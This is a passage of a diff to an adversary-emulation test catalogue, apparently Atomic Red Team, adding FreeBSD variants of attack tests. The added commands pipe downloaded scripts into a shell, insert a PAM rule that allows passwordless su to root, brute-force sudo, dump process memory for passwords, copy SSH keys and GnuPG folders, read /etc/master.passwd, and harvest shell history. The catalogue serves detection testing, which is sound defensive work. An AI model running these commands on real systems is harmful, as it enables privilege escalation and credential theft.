dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + + ' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + + ' + executor: + name: sh + elevation_required: true + command: | + PS2=`logger -t "$USER" -f ~/.sh_history` + $PS2 + tail /var/log/messages + cleanup_command: 'unset PS2 + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 @@ -52148,7 +53956,6 @@ collection: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -52615,6 +54422,35 @@ collection: ' name: bash + - name: Stage data from Discovery.sh (freebsd) + auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46 + description: 'Utilize curl to download discovery.sh and execute a basic information + gathering shell script + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: path + default: "/tmp/T1074.001_discovery.log" + dependency_executor_name: sh + dependencies: + - description: 'Check if curl is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y curl)\n" + executor: + command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh + | sh -s > #{output_file} + + ' + name: sh T1114.001: technique: x_mitre_platforms: @@ -53110,7 +54946,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -53147,7 +54982,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -53184,7 +55018,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -53221,7 +55054,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux input_arguments: path_to_input_file: @@ -57023,6 +58855,36 @@ credential-access: ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} + ' + - name: Malicious PAM rule (freebsd) + auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3 + description: | + Inserts a rule into a PAM config and then tests it. + + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: "/etc/pam.d/su" + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient pam_succeed_if.so uid >= 0 + index: + description: Index where the rule is inserted. + type: integer + default: 8 + executor: + name: sh + elevation_required: true + command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + + ' + cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf} + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 @@ -57230,6 +59092,39 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND + ' + - name: Logging sh history to syslog/messages + auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .shrc + or .profile \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + + ' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + + ' + executor: + name: sh + elevation_required: true + command: | + PS2=`logger -t "$USER" -f ~/.sh_history` + $PS2 + tail /var/log/messages + cleanup_command: 'unset PS2 + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 @@ -57242,7 +59137,6 @@ credential-access: persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -57505,6 +59399,50 @@ credential-access: curl -s #{remote_url} |bash cleanup_command: 'userdel -fr art + ' + - name: SUDO Brute Force - FreeBSD + auto_generated_guid: abcde488-e083-4ee7-bc85-a5684edd7541 + description: "An adversary may find themselves on a box (e.g. via ssh key auth, + with no password) with a user that has sudo'ers privileges, but they do not + know the users password. Normally, failed attempts to access root will not + cause the root account to become locked, to prevent denial-of-service. This + functionality enables an attacker to undertake a local brute force password + guessing attack without locking out the root user. \n\nThis test creates the + \"art\" user with a password of \"password123\", logs in, downloads and executes + the sudo_bruteforce.sh which brute force guesses the password, then deletes + the user\n" + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh + dependency_executor_name: sh + dependencies: + - description: 'Check if running on a FreeBSD based machine. + + ' + prereq_command: | + if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi + if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi + if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi + get_prereq_command: 'pkg update && pkg install -y sudo curl bash + + ' + executor: + name: bash + elevation_required: true + command: | + pw adduser art -g wheel -s /bin/sh + echo "password123" | pw usermod art -h 0 + su art + cd /tmp + curl -s #{remote_url} |bash + cleanup_command: 'rmuser -y art + ' T1003: technique: @@ -58473,6 +60411,51 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" + ' + - name: Dump individual process memory with sh on FreeBSD (Local) + auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to + copy process memory to an external file so it can be searched or exfiltrated later. + On FreeBSD procfs must be mounted. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: path + default: "/tmp/T1003.007.sh" + pid_term: + description: Unique string to use to identify target process + type: string + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + + ' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1) + MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2) + MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START))) + dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" + strings "#{output_file}" | grep -i PASS + cleanup_command: 'rm -f "#{output_file}" + ' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 @@ -58481,7 +60464,6 @@ credential-access: copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -58780,6 +60762,117 @@ credential-access: tshark -c 5 -i #{interface} name: bash elevation_required: true + - name: Packet Capture FreeBSD using tshark or tcpdump + auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67 + description: | + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. + + Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. + supported_platforms: + - linux + input_arguments: + interface: + description: Specify interface to perform PCAP on. + type: string + default: em0 + dependency_executor_name: sh + dependencies: + - description: 'Check if at least one of tcpdump or tshark is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command + -v tshark)" ]; then exit 1; else exit 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n" + executor: + command: | + tcpdump -c 5 -nnni #{interface} + tshark -c 5 -i #{interface} + name: sh + elevation_required: true + - name: Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14 + description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few + seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. + type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true + - name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c + description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp'' + and captures packets for a few seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. + type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -f -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true - name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29 description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few @@ -60072,9 +62165,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: search_path: description: Path where to start searching from. @@ -60116,6 +62208,41 @@ credential-access: exit 0 cleanup_command: 'rm -rf #{output_folder} + ' + name: sh + - name: Copy Private SSH Keys with CP (freebsd) + auto_generated_guid: 12e4a260-a7fd-4ed8-bf18-1a28c1395775 + description: 'Copy private SSH keys on a FreeBSD system to a staging folder + using the `cp` command. + + ' + supported_platforms: + - linux + input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: "/" + output_folder: + description: Output folder containing copies of SSH private key files + type: path + default: "/tmp/art-staging" + dependency_executor_name: sh + dependencies: + - description: 'Install GNU cp from coreutils package. + + ' + prereq_command: 'if [ ! -x "$(command -v gcp)" ]; then exit 1; else exit 0; + fi; + + ' + get_prereq_command: "(which pkg && pkg install -y coreutils)\n" + executor: + command: | + mkdir #{output_folder} + find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \; + cleanup_command: 'rm -rf #{output_folder} + ' name: sh - name: Copy Private SSH Keys with rsync @@ -60143,6 +62270,41 @@ credential-access: exit 0 cleanup_command: 'rm -rf #{output_folder} + ' + name: sh + - name: Copy Private SSH Keys with rsync (freebsd) + auto_generated_guid: 922b1080-0b95-42b0-9585-b9a5ea0af044 + description: 'Copy private SSH keys on a FreeBSD system to a staging folder + using the `rsync` command. + + ' + supported_platforms: + - linux + input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: "/" + output_folder: + description: Output folder containing copies of SSH private key files + type: path + default: "/tmp/art-staging" + dependency_executor_name: sh + dependencies: + - description: 'Check if rsync is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y rsync)\n" + executor: + command: | + mkdir #{output_folder} + find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \; + cleanup_command: 'rm -rf #{output_folder} + ' name: sh - name: Copy the users GnuPG directory with rsync @@ -60170,6 +62332,41 @@ credential-access: exit 0 cleanup_command: 'rm -rf #{output_folder} + ' + name: sh + - name: Copy the users GnuPG directory with rsync (freebsd) + auto_generated_guid: b05ac39b-515f-48e9-88e9-2f141b5bcad0 + description: 'Copy the users GnuPG (.gnupg) directory on a FreeBSD system to + a staging folder using the `rsync` command. + + ' + supported_platforms: + - linux + input_arguments: + search_path: + description: Path where to start searching from + type: path + default: "/" + output_folder: + description: Output folder containing a copy of the .gnupg directory + type: path + default: "/tmp/GnuPG" + dependency_executor_name: sh + dependencies: + - description: 'Check if rsync is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y rsync)\n" + executor: + command: | + mkdir #{output_folder} + find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \; + cleanup_command: 'rm -rf #{output_folder} + ' name: sh T1557.001: @@ -60929,6 +63126,32 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} + ' + name: sh + - name: Search Through sh History + auto_generated_guid: d87d3b94-05b4-40f2-a80f-99864ffa6803 + description: 'Search through sh history for specifice commands we want to capture + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "~/loot.txt" + sh_history_grep_args: + description: grep arguments that filter out specific commands we want to + capture + type: path + default: "-e '-p ' -e 'pass' -e 'ssh'" + sh_history_filename: + description: Path of the sh history file to capture + type: path + default: "~/.history" + executor: + command: 'cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file} + ' name: sh T1552.001: @@ -61017,7 +63240,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - macos - linux input_arguments: @@ -61036,9 +63258,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -61056,9 +63277,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -62006,6 +64226,37 @@ credential-access: command: | cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + - name: SSH Credential Stuffing From FreeBSD + auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4 + description: 'Using username,password combination from a password dump to login + over SSH. + + ' + supported_platforms: + - linux + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: string + default: localhost + dependency_executor_name: sh + dependencies: + - description: 'Requires SSHPASS + + ' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + + ' + get_prereq_command: 'pkg install -y sshpass + + ' + executor: + name: sh + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done T1208: technique: x_mitre_platforms: @@ -62559,11 +64810,29 @@ credential-access: ' name: bash elevation_required: true + - name: Access /etc/master.passwd (Local) + auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5 + description: "/etc/master.passwd file is accessed in FreeBSD environments\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "/tmp/T1003.008.txt" + executor: + command: | + sudo cat /etc/master.passwd > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + + ' + name: sh + elevation_required: true - name: Access /etc/passwd (Local) auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n" supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -62585,7 +64854,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -62609,7 +64877,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -63692,7 +65959,6 @@ discovery: Upon successful execution, sh will stdout list of usernames. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -64280,7 +66546,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -64299,7 +66564,6 @@ discovery: auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 description: "(requires root)\n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -64323,7 +66587,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -64346,7 +66609,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -64395,6 +66657,26 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} + ' + name: sh + - name: Show if a user account has ever logged in remotely (freebsd) + auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35 + description: 'Show if a user account has ever logged in remotely + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "/tmp/T1087.001.txt" + executor: + command: | + lastlogin > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + ' name: sh - name: Enumerate users and groups @@ -64403,7 +66685,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -64517,6 +66798,20 @@ discovery: command: | if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi; + - name: Detect Virtualization Environment (FreeBSD) + auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd + description: | + Detects execution in a virtualized environment. + At boot, dmesg stores a log if a hypervisor is detected. + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization + Environment detected"; fi + + ' T1069.002: technique: modified: '2023-04-07T17:16:47.754Z' @@ -64665,6 +66960,18 @@ discovery: ' name: bash + - name: System Service Discovery - service + auto_generated_guid: b2e1c734-7336-40f9-b970-b04731cbaf8a + description: 'Enumerates system service using service + + ' + supported_platforms: + - linux + executor: + command: 'service -e + + ' + name: sh T1040: technique: modified: '2023-04-12T23:31:49.085Z' @@ -64782,6 +67089,117 @@ discovery: tshark -c 5 -i #{interface} name: bash elevation_required: true + - name: Packet Capture FreeBSD using tshark or tcpdump + auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67 + description: | + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. + + Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. + supported_platforms: + - linux + input_arguments: + interface: + description: Specify interface to perform PCAP on. + type: string + default: em0 + dependency_executor_name: sh + dependencies: + - description: 'Check if at least one of tcpdump or tshark is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command + -v tshark)" ]; then exit 1; else exit 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n" + executor: + command: | + tcpdump -c 5 -nnni #{interface} + tshark -c 5 -i #{interface} + name: sh + elevation_required: true + - name: Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14 + description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few + seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. + type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true + - name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c + description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp'' + and captures packets for a few seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. + type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -f -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true - name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29 description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few @@ -65023,6 +67441,38 @@ discovery: ' name: bash elevation_required: true + - name: Network Share Discovery - FreeBSD + auto_generated_guid: 77e468a6-3e5c-45a1-9948-c4b5603747cb + description: 'Network Share Discovery using smbstatus + + ' + supported_platforms: + - linux + input_arguments: + package_checker: + description: Package checking command. pkg info -x samba + type: string + default: "(pkg info -x samba &>/dev/null)" + package_installer: + description: Package installer command. pkg install -y samba413 + type: string + default: "(which pkg && pkg install -y samba413)" + dependency_executor_name: sh + dependencies: + - description: 'Package with smbstatus (samba) must exist on device + + ' + prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit + 1; fi + + ' + get_prereq_command: "#{package_installer} \n" + executor: + command: 'smbstatus --shares + + ' + name: sh + elevation_required: true T1120: technique: modified: '2023-03-30T21:01:41.575Z' @@ -65162,7 +67612,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -65217,13 +67666,24 @@ discovery: sudo lsmod | grep -i "virtio_pci\|virtio_net" sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" name: bash + - name: FreeBSD VM Check via Kernel Modules + auto_generated_guid: eefe6a49-d88b-41d8-8fc2-b46822da90d3 + description: 'Identify virtual machine host kernel modules. + + ' + supported_platforms: + - linux + executor: + command: | + kldstat | grep -i "vmm" + kldstat | grep -i "vbox" + name: sh - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for FreeBSD, Linux and macOS systems. ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -65238,9 +67698,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'env @@ -65261,6 +67720,20 @@ discovery: kmod list grep vmw /proc/modules name: sh + - name: FreeBSD List Kernel Modules + auto_generated_guid: 4947897f-643a-4b75-b3f5-bed6885749f6 + description: 'Enumerate kernel modules loaded. Upon successful execution stdout + will display kernel modules loaded, followed by list of modules matching ''vmm'' + if present. + + ' + supported_platforms: + - linux + executor: + command: | + kldstat + kldstat | grep vmm + name: sh T1010: technique: modified: '2023-04-15T16:46:04.776Z' @@ -65679,7 +68152,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -65692,6 +68164,28 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null + ' + name: sh + - name: List Google Chromium Bookmark JSON Files on FreeBSD + auto_generated_guid: 88ca025b-3040-44eb-9168-bd8af22b82fa + description: 'Searches for Google Chromium''s Bookmark file (on FreeBSD) that + contains bookmarks in JSON format and lists any found instances to a text + file. + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed. + type: path + default: "/tmp/T1217-Chrome.txt" + executor: + command: | + find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null + ' name: sh T1016: @@ -65788,6 +68282,20 @@ discovery: if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi; if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; name: sh + - name: System Network Configuration Discovery (freebsd) + auto_generated_guid: 7625b978-4efd-47de-8744-add270374bee + description: | + Identify network configuration information. + + Upon successful execution, sh will spawn multiple commands and output will be via stdout. + supported_platforms: + - linux + executor: + command: | + if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; + if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi; + if [ -x "$(command -v netstat)" ]; then netstat -Sp tcp | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; + name: sh T1087: technique: modified: '2023-04-15T17:24:23.029Z' @@ -66006,9 +68514,8 @@ discovery: https://perishablepress.com/list-files-folders-recursively-terminal/ supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -66034,9 +68541,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -66139,7 +68645,6 @@ discovery: Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -66423,7 +68928,6 @@ discovery: Upon successful execution, sh will execute ps and output to /tmp/loot.txt. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -66575,9 +69079,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: | if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; @@ -66670,6 +69173,18 @@ discovery: ' name: bash + - name: Examine password complexity policy - FreeBSD + auto_generated_guid: a7893624-a3d7-4aed-9676-80498f31820f + description: 'Lists the password complexity policy to console on FreeBSD. + + ' + supported_platforms: + - linux + executor: + command: 'cat /etc/pam.d/passwd + + ' + name: sh - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL @@ -66819,7 +69334,6 @@ discovery: Upon successful execution, the output will contain the environment variables that indicate the 5 character locale that can be looked up to correlate the language and territory. supported_platforms: - - linux:freebsd - linux executor: command: 'locale @@ -66877,7 +69391,6 @@ discovery: also used as a builtin command that does not generate syscall telemetry but does provide a list of the environment variables. supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -67092,6 +69605,18 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' + ' + name: sh + - name: Security Software Discovery - pgrep (FreeBSD) + auto_generated_guid: fa96c21c-5fd6-4428-aa28-51a2fbecdbdc + description: | + Methods to identify Security Software on an endpoint + when sucessfully executed, command shell is going to display AV/Security software it is running. + supported_platforms: + - linux + executor: + command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'' + ' name: sh T1526: @@ -67242,7 +69767,6 @@ discovery: Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -67268,7 +69792,6 @@ discovery: Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -67332,6 +69855,18 @@ discovery: executor: command: 'ip route show + ' + name: sh + - name: Remote System Discovery - netstat + auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514 + description: 'Use the netstat command to display the kernels routing tables. + + ' + supported_platforms: + - linux + executor: + command: 'netstat -r | grep default + ' name: sh - name: Remote System Discovery - ip tcp_metrics @@ -67504,6 +70039,44 @@ discovery: nc -nv #{host} #{port} name: sh elevation_required: true + - name: Port Scan Nmap for FreeBSD + auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048 + description: | + Scan ports to check for listening ports with Nmap. + + Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout. + supported_platforms: + - linux + input_arguments: + host: + description: Host to scan. + type: string + default: 192.168.1.1 + port: + description: Ports to scan. + type: string + default: '80' + network_range: + description: Network Range to Scan. + type: string + default: 192.168.1.0/24 + dependency_executor_name: sh + dependencies: + - description: 'Check if nmap command exists on the machine + + ' + prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; 